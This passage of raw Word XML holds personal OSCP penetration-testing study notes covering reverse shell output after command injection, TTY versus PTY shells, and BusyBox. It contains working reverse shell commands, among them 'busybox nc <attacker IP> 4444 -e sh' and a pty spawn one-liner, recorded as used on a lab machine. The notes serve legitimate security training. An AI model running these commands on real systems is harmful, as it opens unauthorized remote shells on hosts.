    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 4444 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50325</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows PowerShell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright (C) Microsoft Corporation. All rights reserved.</w:t>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t xml:space="preserve">PS C:\Users\Administrator\Documents\meteor&gt;</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 50 - Successfull reverse shell connection via Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 50 shows that we received a reverse shell. Instead of using Powercat, we could also inject a PowerShell reverse shell directly. There are many ways to exploit a command injection vulnerability that depend heavily on the underlying operating system and the implementation of the web application, as well as any security mechanisms in place.</w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e7ck8gjg5204" w:id="125"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell Types Explained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY (real terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REAL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terminal, like the normal terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used when you're physically or virtually logged into a system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples: console login, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gives full interactive control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTY (pseudo-terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software emulation of a TTY.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used when a program needs terminal features but no real terminal exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it's impossible to upgrade from rev shell to TTY, we have to upgrade to PTY instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell / Weak Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The connection you get from ncat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1231"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lacks basic features</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test if you have tty/pty:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says something like /dev/pts/0 → you have a PTY/TTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says not a tty → you’re in a dumb shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But you can usually just tell from using it</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B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r74qrsqbsv9i" w:id="126"/>
      <w:bookmarkEnd w:id="126"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Busybox</w:t>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t xml:space="preserve">Busy Box is basically a single lightweight binary that bundles tons of common Linux utilities into one file. This includes sh, ls, nc, and cat.</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t xml:space="preserve">For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag is specific to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, the normal payload would be: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we are basically just adding "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY EASY TO USE!</w:t>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rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also for OSCP-B, it was seen twice, and in both cases, nc was actually installed in both machines, and yet we were unable to use it to get a foothold into the machine. But busybox's nc did work. Idk why using the normal nc didn't work though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E87">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E88">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also note that busybox is not always installed. If you have command execution you can check via:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which busybox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Should be </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/busybox</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is snippet of OSCP-B .150 which used Busybox when none of the reverse shell stuff worked"</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I couldn't get nc, bash, or ping to work. So I looked at discord and we had to use this tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. BusyBox is basically a single lightweight binary that bundles tons of common Linux utilities into one file. This includes sh, ls, nc, and cat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we could use this to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77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busybox nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="772"/>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busybox nc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is how to use nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="772"/>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-e sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "Execute /bin/sh and attach it to the socket"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="772"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is part of nc, not busybox. Could have also done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e bash</w:t>
      </w:r>
    </w:p>
